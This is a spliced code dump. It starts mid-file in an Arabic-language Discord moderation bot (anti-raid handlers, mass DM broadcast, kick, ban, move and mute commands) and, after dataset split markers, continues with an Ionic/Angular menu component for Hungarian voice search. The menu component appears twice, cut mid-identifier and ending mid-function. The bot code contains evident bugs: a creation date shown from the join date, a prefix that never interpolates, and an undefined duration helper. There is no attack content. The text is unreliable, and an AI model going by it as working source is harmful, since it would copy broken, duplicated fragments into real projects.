channelc[channelcreate.id].created += 3;
if(channelc[channelcreate.id].created >= Onumber ) {
let roles = guild.members.get(banner).roles.array();
guild.members.get(banner).removeRoles(roles);
rebellog.send(`<@!${channelcreate.id}>
حآول العبث بالسيرفر @everyone`);
channel.guild.owner.send(`<@!${channelcreate.id}>
حآول العبث بالسيرفر ${channel.guild.name}`)
}
setTimeout(() => {
channelc[channelcreate.id].created = 0;
},Otime)
});
let channelr = {};
client.on('channelDelete', async (channel) => {
const rebellog = client.channels.find("name", "log"),
Oguild = channel.guild,
Onumber = 10,
Otime = 10000;
const audit = await channel.guild.fetchAuditLogs({limit: 1});
const channelremover = audit.entries.first().executor;
console.log(` A ${channel.type} Channel called ${channel.name} was deleted By ${channelremover.tag}`);
if(!channelr[channelremover.id]) {
channelr[channelremover.id] = {
deleted : 0
}
}
client.on('message', message => {
var prefix = "$";
if (message.author.id === client.user.id) return;
if (message.guild) {
let embed = new Discord.RichEmbed()
let args = message.content.split(' ').slice(1).join(' ');
if(message.content.split(' ')[0] == prefix + 'bc') {
if (!args[1]) {
message.channel.send("**اكتب شي بعد الكوماند**");
return;
}
message.guild.members.forEach(m => {
if(!message.member.hasPermission('ADMINISTRATOR')) return;
var bc = new Discord.RichEmbed()
.addField('» السيرفر :', `${message.guild.name}`)
.addField('» المرسل : ', `${message.author.username}#${message.author.discriminator}`)
.addField(' » الرسالة : ', args)
.setColor('#ff0000')
// m.send(`[${m}]`);
m.send(`${m}`,{embed: bc});
});
}
} else {
return;
}
});
client.on('guildMemberAdd', member => {
member.guild.fetchInvites().then(guildInvites => {
const ei = invites[member.guild.id];
const invite = guildInvites.find(i => ei.get(i.code).uses < i.uses);
const inviter = client.users.get(invite.inviter.id);
const channel = member.guild.channels.find("name", "✽-welcome");
channel.send(`<@${member.user.id}> ** joined; ** Invited by ** <@${inviter.id}> ** `);
});
});
1.36 KB
client.on('message', message => {
var prefix = "$"
if (message.content.startsWith(prefix + 'id')) {
if (message.author.bot) return
if (!message.guild) return message.reply('**This Command Just In Servers**')
message.guild.fetchInvites().then(invs => {
let personalInvites = invs.filter(i => i.inviter.id === message.author.id)
let inviteCount = personalInvites.reduce((p, v) => v.uses + p, 0)
var roles = message.member.roles.map(roles => `**__${roles.name}__ |**`).join(` `)
let id = new Discord.RichEmbed()
.setColor('RANDOM')
.setTitle(':clipboard: | User identity info')
.setAuthor(message.author.username,message.author.avatarURL)
.addField('• Name :', message.author.username,true)
.addField('• Tag :', message.author.discriminator,true)
.addField('• ID :', message.author.id,true)
.addField('• JoinedAt :', moment(message.joinedAt).format('D/M/YYYY h:mm a '),true)
.addField('• CreatedAt :', moment(message.joinedAt).format('D/M/YYYY h:mm a '),true)
.addField('• Total invites :', inviteCount,true)
.addField('• Roles :', roles)
.setTimestamp()
message.channel.sendEmbed(id).then(c => {
c.react('📋')
})
})
}
});
var prefix = "$"
client.on("message", (message) => {
if (message.content.startsWith("${prefix}kick")) {
if(!message.member.hasPermission('KICK_MEMBERS')) return message.reply('? ماعندك الصلاحيات');
var member= message.mentions.members.first();
member.kick().then((member) => {
message.channel.send(member.displayName + " مع السلامه :wave: ");
}).catch(() => {
message.channel.send("Error -_-");
});
}
});
var prefix = "$"
client.on('message', message => {
if (message.author.xErenaa) return;
if (!message.content.startsWith(prefix)) return;
let command = message.content.split(" ")[0];
command = command.slice(prefix.length);
let args = message.content.split(" ").slice(1);
if (command == "ban") {
if(!message.channel.guild) return message.reply('** This command only for servers**');
if(!message.guild.member(message.author).hasPermission("BAN_MEMBERS")) return message.reply("**You Don't Have ` BAN_MEMBERS ` Permission**");
if(!message.guild.member(client.user).hasPermission("BAN_MEMBERS")) return message.reply("**I Don't Have ` BAN_MEMBERS ` Permission**");
let user = message.mentions.users.first();
let reason = message.content.split(" ").slice(2).join(" ");
/*let bErenaalog = client.channels.find("name", "Erenaa-log");
if(!bErenaalog) return message.reply("I've detected that this server doesn't have a Erenaa-log text channel.");*/
if (message.mentions.users.size < 1) return message.reply("**منشن شخص**");
if(!reason) return message.reply ("**اكتب سبب الطرد**");
if (!message.guild.member(user)
.bannable) return message.reply("**لايمكنني طرد شخص اعلى من رتبتي يرجه اعطاء البوت رتبه عالي**");
message.guild.member(user).ban(7, user);
const banembed = new Discord.RichEmbed()
.setAuthor(`BANNED!`, user.displayAvatarURL)
.setColor("RANDOM")
.setTimestamp()
.addField("**User:**", '**[ ' + `${user.tag}` + ' ]**')
.addField("**By:**", '**[ ' + `${message.author.tag}` + ' ]**')
.addField("**Reason:**", '**[ ' + `${reason}` + ' ]**')
message.channel.send({
embed : banembed
})
}
});
client.on('message', message => {
if(!message.channel.guild) return;
if(message.content.startsWith(prefix + 'move')) {
if (message.member.hasPermission("MOVE_MEMBERS")) {
if (message.mentions.users.size === 0) {
return message.channel.send("``لاستخدام الأمر اكتب هذه الأمر : " +prefix+ "move [USER]``")
}
if (message.member.voiceChannel != null) {
if (message.mentions.members.first().voiceChannel != null) {
var authorchannel = message.member.voiceChannelID;
var usermentioned = message.mentions.members.first().id;
var embed = new Discord.RichEmbed()
.setTitle("Succes!")
.setColor("#000000")
.setDescription(`لقد قمت بسحب <@${usermentioned}> الى الروم الصوتي الخاص بك✅ `)
var embed = new Discord.RichEmbed()
.setTitle(`You are Moved in ${message.guild.name}`)
.setColor("RANDOM")
.setDescription(`**<@${message.author.id}> Moved You To His Channel!\nServer --> ${message.guild.name}**`)
message.guild.members.get(usermentioned).setVoiceChannel(authorchannel).then(m => message.channel.send(embed))
message.guild.members.get(usermentioned).send(embed)
} else {
message.channel.send("``لا تستطيع سحب "+ message.mentions.members.first() +" `يجب ان يكون هذه العضو في روم صوتي`")
}
} else {
message.channel.send("**``يجب ان تكون في روم صوتي لكي تقوم بسحب العضو أليك``**")
}
} else {
message.react("❌")
}}});
Save New Duplicate & Edit Just Text Twitter
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
const ms = require("ms");
client.on("message", message => {
if(!message.channel.guild) return;
if (message.author.bot) return;
let command = message.content.split(" ")[0];
if (message.content.split(" ")[0].toLowerCase() === prefix + "unmute") {
if (!message.member.hasPermission('MANAGE_ROLES')) return;
let user = message.mentions.users.first();
let modlog = client.channels.find('name', 'log');
let muteRole = client.guilds.get(message.guild.id).roles.find('name', 'Muted');
if (!muteRole) return message.reply(" I Can’t Find 'Muted' Role ").catch(console.error).then(message => message.delete(4000))
if (message.mentions.users.size < 1) return message.reply(' Error : ``Mention a User``').catch(console.error).then(message => message.delete(4000))
if (!message.guild.member(client.user).hasPermission('MANAGE_ROLES_OR_PERMISSIONS')) return;
if (message.guild.member(user).removeRole(muteRole.id)) {
return message.reply("User Has Been UnMuted.").catch(console.error).then(message => message.delete(4000))
} else {
message.guild.member(user).removeRole(muteRole).then(() => {
return message.reply("User Has Been UnMuted.").catch(console.error).then(message => message.delete(4000))
});
}
};
});
client.on('message',function(message) {
if(!message.channel.guild) return; let messageArray = message.content.split(' ');
let muteRole = message.guild.roles.find('name', 'Muted');
let muteMember = message.mentions.members.first();
let muteReason = messageArray[2];
let muteDuration = messageArray[3];
if (message.content.split(" ")[0].toLowerCase() === prefix + "mute") {
if (message.author.bot) return;
if(!muteRole) return message.guild.createRole({name: 'Muted'}).then(message.guild.channels.forEach(chan => chan.overwritePermissions(muteRole, {SEND_MESSAGES:false,ADD_REACTIONS:false})));
if(!message.guild.member(message.author).hasPermission("MANAGE_ROLES")) return message.channel.send(' Error : You Need `` MANAGE_ROLES ``Permission ');
if(!message.guild.member(client.user).hasPermission("MANAGE_ROLES")) return message.channel.send(' Error : I Don’t Have `` MANAGE_ROLES ``Permission ');
if(!muteMember) return message.channel.send(' Error : ``Mention a User``').then(message => message.delete(4000))
if(!muteReason) return message.channel.send(' Error : ``Supply a Reason``').then(message => message.delete(4000))
if(!muteDuration) return message.channel.send(' Error : `` Supply Mute Time `` \n Ex: #mute @user reason 1m ').then(message => message.delete(4000))
if(!muteDuration.match(/[1-7][s,m,h,d,w]/g)) return message.channel.send(' Error : `` Invalid Mute Duration``').then(message => message.delete(4000))
message.channel.send(`${muteMember} Has Been Muted.`).then(message => message.delete(5000))
muteMember.addRole(muteRole);
muteMember.setMute(true)
.then(() => { setTimeout(() => {
muteMember.removeRole(muteRole)
muteMember.setMute(false)
}, mmss(muteDuration));
});
}
});
client.login(process.env.BOT_TOKEN); | random_line_split |
|
menus.component.ts | import { Component, OnInit } from '@angular/core';
import { CoreService } from 'src/app/services/core.service';
import { Platform, AlertController, PickerController } from '@ionic/angular';
import { SocialSharing } from '@ionic-native/social-sharing/ngx';
import { TranslateService } from '@ngx-translate/core';
import { Toast } from '@ionic-native/toast/ngx';
import { Storage } from '@ionic/storage';
import { EventsService } from 'src/app/services/events.service';
import { DEFAULT_LIST_POSTS_TEMPLATE } from '../../const/general';
import {HttpClient} from "@angular/common/http";
import {SpeechRecognition,SpeechRecognitionListeningOptions,SpeechRecognitionListeningOptionsIOS} from "@ionic-native/speech-recognition/ngx";
import { ItemCommentComponent } from '../item-comment/item-comment.component';
import { isArray } from 'util';
import { LoadingController, NavController } from '@ionic/angular';
import { ToastController } from '@ionic/angular';
import { InAppBrowser } from '@ionic-native/in-app-browser/ngx';
//import {ReportsPage} from '../../reports/reports.page';
// open jobs cat
import {Router} from "@angular/router";
declare var window;
@Component({
selector: 'app-menus',
templateUrl: './menus.component.html',
providers: [SocialSharing],
styleUrls: ['./menus.component.scss'],
})
export class MenusComponent implements OnInit {
// list pages data
pages: Object[];
// translate for this page
trans: Object;
// templates for settings
templates: string;
// Language display
CityName: any;
// set title
title: string;
public showSearchBar = false;
items:any[]=[];
itemstemp:any[]=[];
str:string="";
itemss:any[]=[];
asds:string="";
speakingStart:boolean = false;
constructor(
private translate: TranslateService,
private core: CoreService,
private platform: Platform,
private SocialSharing: SocialSharing,
private alertCtrl: AlertController,
private Toast: Toast,
private storage: Storage,
private pickerCtrl: PickerController,
private http:HttpClient,
events: EventsService,
private speech:SpeechRecognition,
public loadingController: LoadingController,
public toastController: ToastController,
private router:Router,
public navCtrl: NavController,
private iab: InAppBrowser
) {
this.navCtrl = navCtrl
window.menus = this;
// get translate
translate.get('menu').subscribe(trans => this.trans = trans);
// call get pages function
this.getPages();
// get templates from storage
storage.get('templates').then(templates => {
if (!templates) templates = DEFAULT_LIST_POSTS_TEMPLATE;
this.templates = templates;
});
events.watchOffline().subscribe(() => {
if ((!this.pages || this.pages.length < 1)) {
this.getPages();
}
});
this.getLanguage();
// Get the list of supported languages
// this.speech.getSupportedLanguages()
// .then(
// (languages: Array<string>) => console.log(languages),
// (error) => console.log(error)
// )
}
openUrl(url) {
this.iab.create( url, '_system' );
}
// reports() {
// this.router.navigateByUrl('../reports/')
// }
// *********************************************************
// Voice search - No City found
// *********************************************************
ifNoResFound(){
this.alertCtrl.create({
message:"<h6>Nincs találat.</h6>",
buttons:[
{
text:"Újra",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár",
}
]
}).then((element)=>{
element.present();
})
}
// *********************************************************
// Voice search from here - Ask User permission to acces Mic
// *********************************************************
ask | {
if(this.speakingStart == false)
{
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring1" size="large"></ion-icon></h1> <p><h6>Kattints az OK gombra és beszélj.<h6></p>',
buttons:[
{
text:"OK",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár"
}
]
}).then((element)=>{
element.present();
})
}
}
// ***********************************
// Loading before show results - voice
// ***********************************
async presentLoading() {
const loading = await this.loadingController.create({
cssClass: 'my-custom-class',
message: '<ion-icon class="match-load" name="checkmark-outline"></ion-icon>Találat betoltése… ',
duration: 1000
});
await loading.present();
const { role, data } = await loading.onDidDismiss();
console.log('Loading dismissed!');
}
// ***********************************
// Show toast when user need to talk
// ************************************
async presentToast() {
// const toast = await this.toastController.create({
// message: 'Talk now... <ion-icon name="mic-outline"></ion-icon>',
// duration: 3000,
// color: 'danger'
// // position: 'middle'
// });
// toast.present();
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring" size="large"></ion-icon></h1><br><h6 class="listening">Hallgatlak</h6>',
backdropDismiss: false // <- Here! :)
}).then((element)=>{
element.present();
// setTimeout(()=>{
// element.dismiss();
// }, 3000);
});
}
// *************************
// Call speech search
// **************************
openSpeech()
{
this.speakingStart = true;
// call talk now toast
this.presentToast();
var options:SpeechRecognitionListeningOptionsIOS=
{
showPartial:true,
matches:1,
language: 'hu-HU',
}
var ref = this;
let sub = this.speech.startListening(options).subscribe((data:string[])=>{
if(data.length > 0)
{
// hide alert for listening
this.alertCtrl.dismiss();
document.getElementById("ctc").innerHTML = "";
this.speech.stopListening();
sub.unsubscribe();
this.speakingStart = false;
var node = document.createElement("p");
let found = false;
for(var i = 0;i<this.itemstemp.length;i++)
{
if(data[0].trim() == this.itemstemp[i].value.trim())
{
// loading
this.presentLoading();
found = true;
// Show results after a 1 sec
setTimeout(() => {
// var textnode = document.createTextNode(data[0].trim()+">>"); // Create a text node
// node.appendChild(textnode);
// node.onclick = function()
// {
// ref.tempCalll(data[0].trim());
this.tempCalll(data[0].trim());
// }
// // Append the text to <div>
// document.getElementById("ctc").appendChild(node);
}, 1000);
// this.tempCalll(data[0].trim());
}
}
if(found == false)
{
//alert("No City found!");
// Call no city found method
this.ifNoResFound();
} // Create a <li> node
}
else{
alert("no records found!");
var para = document.createElement("P");
var t = document.createTextNode("no records found!");
para.appendChild(t);
document.getElementById("ctc").appendChild(para);
}
},(err)=>{
//alert(JSON.stringify(err));
//this.speech.stopListening();
//this.openSpeech()
this.ifNoResFound();
})
}
// Show resukt of voice search
tempCalll(dat)
{
//alert(dat);
for(var i = 0;i<this.itemstemp.length;i++)
{
if(dat == this.itemstemp[i].value)
{
//alert("matched");
this.tempCall(this.itemstemp[i]);
return;
}
}
}
getItemsVoice(str) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
const val = str;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "Nincs találat.";
}
} else{
this.isItemAvailable = false;
}
}
// *************************
// Show search input
// *************************
clickedSearchIcon(event: Event) {
this.showSearchBar = !this.showSearchBar;
}
// *************************
// auto search
// *************************
isItemAvailable = false;
readJsonData(){
//this.items = ["Test", "Test1", "Test2"].subscribe(data => {
this.http.get("assets/i18n/languages.json").subscribe((data:any)=>{
this.items =data.languages;
this.itemstemp = this.items;
//this.isItemAvailable = true;
})
}
// *************************
// Get autocomplete items
// *************************∏
getItems(ev: any) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
document.getElementById("ctc").innerHTML = "";
const val = ev.target.value;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "No City found";
}
} else{
this.isItemAvailable = false;
}
}
// Display City In the Header
// ************************
getLanguage() {
var CityName = "";
this.storage.get("language").then((language) => {
this.CityName = language;
//console.log(language);
let num = language
let stringForm = num.toString();
//console.log(stringForm);
console.log(CityName)
})
}
ngOnInit() {
//this.loadData();
this.readJsonData();
}
getPages(refresher?) {
// function get list pages
this.core.request('m_pages').subscribe(pages => {
this.pages = pages;
if (refresher) refresher.target.complete();
}, err => {
if (refresher) refresher.target.complete();
});
}
async settings() {
// when click templates
let alert = await this.alertCtrl.create({
header: this.trans['settings']['title'],
cssClass: 'alert-buttons-no-border',
buttons: [
// {
// text: this.trans['languages']['title'],
// handler: () => { this.languages(); }
// },
{
text: this.trans['templates']['title'],
handler: () => { this.updateTemplates(); }
},
{
text: this.trans['cache']['title'],
handler: () => { this.clearCache(); }
},
{
text: this.trans['settings']['cancel'],
cssClass: 'place'
}
]
});
alert.present();
}
// get languages
languages() {
let language = this.translate.getDefaultLang();
this.translate.getTranslation('languages').subscribe(async langTrans => {
if (langTrans['languages'] && langTrans['languages'].length > 0) {
// create picker
// add picker column
let columns: any = {
name: 'language',
options: []
};
// add column options
let defaultIndex: Number;
langTrans['languages'].forEach((lang, index) => {
columns.options.push({
text: lang['name'],
value: lang['value']
});
// find default index
if (lang['value'] == language) defaultIndex = index;
});
// set default index and add column
columns['selectedIndex'] = defaultIndex;
if (!language) language = langTrans['default'];
let picker = await this.pickerCtrl.create({
columns: [columns],
buttons: [
{
text: this.trans['languages']['cancel'],
role: 'cancel'
},
{
text: this.trans['languages']['save'],
handler: data => {
if (data['language']['value'] == language) return;
this.storage.set('language', data['language']['value']).then(() => {
this.storage.remove('last_config').then(() => {
this.refresh();
});
});
}
}
]
});
// show picker
picker.present();
}
});
}
// *********************************
// Call city set after click on item
// *********************************
tempCall(obj)
{
//alert(obj);
//alert(JSON.stringify(obj));
let data:any={};
data['language'] = obj.value;
//alert(obj.value);
this.storage.set('language', data['language']).then(() => {
this.storage.remove('last_config').then(() => {
// alert("refresh call 1");
this.refresh();
},(err)=>{
// alert("refresh call 2");
this.refresh();
}) ;
},(err)=>{
//alert("refresh call 3");
this.refresh();
});
}
// Update template
async updateTemplates() {
if (!Array.isArray(this.trans['templates']['options'])) return;
let buttons = [];
// when click templates
this.trans['templates']['options'].forEach(option => {
let button = {
text: option['text'],
cssClass: option['_value'] == this.templates ? 'danger' : '',
handler: () => {
if (option['_value'] == this.templates) return;
this.storage.set('templates', option['_value']).then(() => {
this.refresh();
});
}
};
buttons.push(button);
});
buttons.push({
text: this.trans['templates']['cancel'],
cssClass: 'place'
});
let alert = await this.alertCtrl.create({
header: this.trans['templates']['title'],
message: this.trans['templates']['message'],
cssClass: 'alert-buttons-no-border',
buttons: buttons
});
alert.present();
}
clearCache() {
// when click clear cache
this.platform.ready().then(async () => {
let alert = await this.alertCtrl.create({
header: this.trans['cache']['title'],
message: this.trans['cache']['message'],
buttons: [
{
text: this.trans['cache']['yes'],
handler: () => {
if (window && window['CacheClear']) window['CacheClear'](status => {
this.Toast.showShortCenter(this.trans['cache']['success']).subscribe(() => { }, () => { });
}, err => {
this.Toast.showShortCenter(this.trans['cache']['error']).subscribe(() => { }, () => { });
});
}
},
{ text: this.trans['cache']['no'] }
]
});
alert.present();
});
}
rate() {
// function open application on store
this.core.openStore();
}
// share application store link
// *****************************
share() {
// function share application
let share = this.platform.is('ios') ? this.core.getConfig('share_ios') : this.core.getConfig('share_android');
this.SocialSharing.share(share, null, null, null);
}
async refresh(alert?) {
// refresh application
if (alert) {
let alert = await this.alertCtrl.create({
header: this.trans['refresh']['title'],
message: this.trans['refresh']['message'],
buttons: [
{
text: this.trans['refresh']['yes'],
handler: () => {
location.href = '/';
}
},
{ text: this.trans['refresh']['no'] }
]
});
alert.present();
} else location.href = '/';
}
}
| Permission()
| identifier_name |
menus.component.ts | import { Component, OnInit } from '@angular/core';
import { CoreService } from 'src/app/services/core.service';
import { Platform, AlertController, PickerController } from '@ionic/angular';
import { SocialSharing } from '@ionic-native/social-sharing/ngx';
import { TranslateService } from '@ngx-translate/core';
import { Toast } from '@ionic-native/toast/ngx';
import { Storage } from '@ionic/storage';
import { EventsService } from 'src/app/services/events.service';
import { DEFAULT_LIST_POSTS_TEMPLATE } from '../../const/general';
import {HttpClient} from "@angular/common/http";
import {SpeechRecognition,SpeechRecognitionListeningOptions,SpeechRecognitionListeningOptionsIOS} from "@ionic-native/speech-recognition/ngx";
import { ItemCommentComponent } from '../item-comment/item-comment.component';
import { isArray } from 'util';
import { LoadingController, NavController } from '@ionic/angular';
import { ToastController } from '@ionic/angular';
import { InAppBrowser } from '@ionic-native/in-app-browser/ngx';
//import {ReportsPage} from '../../reports/reports.page';
// open jobs cat
import {Router} from "@angular/router";
declare var window;
@Component({
selector: 'app-menus',
templateUrl: './menus.component.html',
providers: [SocialSharing],
styleUrls: ['./menus.component.scss'],
})
export class MenusComponent implements OnInit {
// list pages data
pages: Object[];
// translate for this page
trans: Object;
// templates for settings
templates: string;
// Language display
CityName: any;
// set title
title: string;
public showSearchBar = false;
items:any[]=[];
itemstemp:any[]=[];
str:string="";
itemss:any[]=[];
asds:string="";
speakingStart:boolean = false;
constructor(
private translate: TranslateService,
private core: CoreService,
private platform: Platform,
private SocialSharing: SocialSharing,
private alertCtrl: AlertController,
private Toast: Toast,
private storage: Storage,
private pickerCtrl: PickerController,
private http:HttpClient,
events: EventsService,
private speech:SpeechRecognition,
public loadingController: LoadingController,
public toastController: ToastController,
private router:Router,
public navCtrl: NavController,
private iab: InAppBrowser
) {
this.navCtrl = navCtrl
window.menus = this;
// get translate
translate.get('menu').subscribe(trans => this.trans = trans);
// call get pages function
this.getPages();
// get templates from storage
storage.get('templates').then(templates => {
if (!templates) templates = DEFAULT_LIST_POSTS_TEMPLATE;
this.templates = templates;
});
events.watchOffline().subscribe(() => {
if ((!this.pages || this.pages.length < 1)) {
this.getPages();
}
});
this.getLanguage();
// Get the list of supported languages
// this.speech.getSupportedLanguages()
// .then(
// (languages: Array<string>) => console.log(languages),
// (error) => console.log(error)
// )
}
openUrl(url) {
this.iab.create( url, '_system' );
}
// reports() {
// this.router.navigateByUrl('../reports/')
// }
// *********************************************************
// Voice search - No City found
// *********************************************************
ifNoResFound(){
this.alertCtrl.create({
message:"<h6>Nincs találat.</h6>",
buttons:[
{
text:"Újra",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
this.openSpeech();
}
else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár",
}
]
}).then((element)=>{
element.present();
})
}
// *********************************************************
// Voice search from here - Ask User permission to acces Mic
// *********************************************************
askPermission()
{
if(this.speakingStart == false)
{
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring1" size="large"></ion-icon></h1> <p><h6>Kattints az OK gombra és beszélj.<h6></p>',
buttons:[
{
text:"OK",
handler:()=>{
this.speech.hasPermission().then((hasPermission)=>{
if(hasPermission)
{
| else{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
}
},(err)=>{
this.speech.requestPermission().then(()=>{
this.openSpeech();
})
})
}
},
{
text:"Bezár"
}
]
}).then((element)=>{
element.present();
})
}
}
// ***********************************
// Loading before show results - voice
// ***********************************
async presentLoading() {
const loading = await this.loadingController.create({
cssClass: 'my-custom-class',
message: '<ion-icon class="match-load" name="checkmark-outline"></ion-icon>Találat betoltése… ',
duration: 1000
});
await loading.present();
const { role, data } = await loading.onDidDismiss();
console.log('Loading dismissed!');
}
// ***********************************
// Show toast when user need to talk
// ************************************
async presentToast() {
// const toast = await this.toastController.create({
// message: 'Talk now... <ion-icon name="mic-outline"></ion-icon>',
// duration: 3000,
// color: 'danger'
// // position: 'middle'
// });
// toast.present();
this.alertCtrl.create({
message:'<h1><ion-icon name="mic-outline" class="mix-size pulse-ring" size="large"></ion-icon></h1><br><h6 class="listening">Hallgatlak</h6>',
backdropDismiss: false // <- Here! :)
}).then((element)=>{
element.present();
// setTimeout(()=>{
// element.dismiss();
// }, 3000);
});
}
// *************************
// Call speech search
// **************************
openSpeech()
{
this.speakingStart = true;
// call talk now toast
this.presentToast();
var options:SpeechRecognitionListeningOptionsIOS=
{
showPartial:true,
matches:1,
language: 'hu-HU',
}
var ref = this;
let sub = this.speech.startListening(options).subscribe((data:string[])=>{
if(data.length > 0)
{
// hide alert for listening
this.alertCtrl.dismiss();
document.getElementById("ctc").innerHTML = "";
this.speech.stopListening();
sub.unsubscribe();
this.speakingStart = false;
var node = document.createElement("p");
let found = false;
for(var i = 0;i<this.itemstemp.length;i++)
{
if(data[0].trim() == this.itemstemp[i].value.trim())
{
// loading
this.presentLoading();
found = true;
// Show results after a 1 sec
setTimeout(() => {
// var textnode = document.createTextNode(data[0].trim()+">>"); // Create a text node
// node.appendChild(textnode);
// node.onclick = function()
// {
// ref.tempCalll(data[0].trim());
this.tempCalll(data[0].trim());
// }
// // Append the text to <div>
// document.getElementById("ctc").appendChild(node);
}, 1000);
// this.tempCalll(data[0].trim());
}
}
if(found == false)
{
//alert("No City found!");
// Call no city found method
this.ifNoResFound();
} // Create a <li> node
}
else{
alert("no records found!");
var para = document.createElement("P");
var t = document.createTextNode("no records found!");
para.appendChild(t);
document.getElementById("ctc").appendChild(para);
}
},(err)=>{
//alert(JSON.stringify(err));
//this.speech.stopListening();
//this.openSpeech()
this.ifNoResFound();
})
}
// Show resukt of voice search
tempCalll(dat)
{
//alert(dat);
for(var i = 0;i<this.itemstemp.length;i++)
{
if(dat == this.itemstemp[i].value)
{
//alert("matched");
this.tempCall(this.itemstemp[i]);
return;
}
}
}
getItemsVoice(str) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
const val = str;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "Nincs találat.";
}
} else{
this.isItemAvailable = false;
}
}
// *************************
// Show search input
// *************************
clickedSearchIcon(event: Event) {
this.showSearchBar = !this.showSearchBar;
}
// *************************
// auto search
// *************************
isItemAvailable = false;
readJsonData(){
//this.items = ["Test", "Test1", "Test2"].subscribe(data => {
this.http.get("assets/i18n/languages.json").subscribe((data:any)=>{
this.items =data.languages;
this.itemstemp = this.items;
//this.isItemAvailable = true;
})
}
// *************************
// Get autocomplete items
// *************************∏
getItems(ev: any) {
// Reset items back to all of the items
//console.log(this.getCities());
// set val to the value of the searchbar
//this.isItemAvailable = true;
document.getElementById("ctc").innerHTML = "";
const val = ev.target.value;
console.log(val);
this.items = this.itemstemp;
// // if the value is an empty string don't filter the items
if (val && val.trim() !== '') {
this.isItemAvailable = true;
this.items = this.items.filter((item) => {
return (item.name.toLowerCase().indexOf(val.toLowerCase()) > -1);
})
if(this.items.length > 0)
{
this.str = "";
}
else{
this.str = "No City found";
}
} else{
this.isItemAvailable = false;
}
}
// Display City In the Header
// ************************
getLanguage() {
var CityName = "";
this.storage.get("language").then((language) => {
this.CityName = language;
//console.log(language);
let num = language
let stringForm = num.toString();
//console.log(stringForm);
console.log(CityName)
})
}
ngOnInit() {
//this.loadData();
this.readJsonData();
}
getPages(refresher?) {
// function get list pages
this.core.request('m_pages').subscribe(pages => {
this.pages = pages;
if (refresher) refresher.target.complete();
}, err => {
if (refresher) refresher.target.complete();
});
}
async settings() {
// when click templates
let alert = await this.alertCtrl.create({
header: this.trans['settings']['title'],
cssClass: 'alert-buttons-no-border',
buttons: [
// {
// text: this.trans['languages']['title'],
// handler: () => { this.languages(); }
// },
{
text: this.trans['templates']['title'],
handler: () => { this.updateTemplates(); }
},
{
text: this.trans['cache']['title'],
handler: () => { this.clearCache(); }
},
{
text: this.trans['settings']['cancel'],
cssClass: 'place'
}
]
});
alert.present();
}
// get languages
languages() {
let language = this.translate.getDefaultLang();
this.translate.getTranslation('languages').subscribe(async langTrans => {
if (langTrans['languages'] && langTrans['languages'].length > 0) {
// create picker
// add picker column
let columns: any = {
name: 'language',
options: []
};
// add column options
let defaultIndex: Number;
langTrans['languages'].forEach((lang, index) => {
columns.options.push({
text: lang['name'],
value: lang['value']
});
// find default index
if (lang['value'] == language) defaultIndex = index;
});
// set default index and add column
columns['selectedIndex'] = defaultIndex;
if (!language) language = langTrans['default'];
let picker = await this.pickerCtrl.create({
columns: [columns],
buttons: [
{
text: this.trans['languages']['cancel'],
role: 'cancel'
},
{
text: this.trans['languages']['save'],
handler: data => {
if (data['language']['value'] == language) return;
this.storage.set('language', data['language']['value']).then(() => {
this.storage.remove('last_config').then(() => {
this.refresh();
});
});
}
}
]
});
// show picker
picker.present();
}
});
}
// *********************************
// Call city set after click on item
// *********************************
tempCall(obj)
{
//alert(obj);
//alert(JSON.stringify(obj));
let data:any={};
data['language'] = obj.value;
//alert(obj.value);
this.storage.set('language', data['language']).then(() => {
this.storage.remove('last_config').then(() => {
// alert("refresh call 1");
this.refresh();
},(err)=>{
// alert("refresh call 2");
this.refresh();
}) ;
},(err)=>{
//alert("refresh call 3");
this.refresh();
});
}
// Update template
async updateTemplates() {
if (!Array.isArray(this.trans['templates']['options'])) return;
let buttons = [];
// when click templates
this.trans['templates']['options'].forEach(option => {
let button = {
text: option['text'],
cssClass: option['_value'] == this.templates ? 'danger' : '',
handler: () => {
if (option['_value'] == this.templates) return;
this.storage.set('templates', option['_value']).then(() => {
this.refresh();
});
}
};
buttons.push(button);
});
buttons.push({
text: this.trans['templates']['cancel'],
cssClass: 'place'
});
let alert = await this.alertCtrl.create({
header: this.trans['templates']['title'],
message: this.trans['templates']['message'],
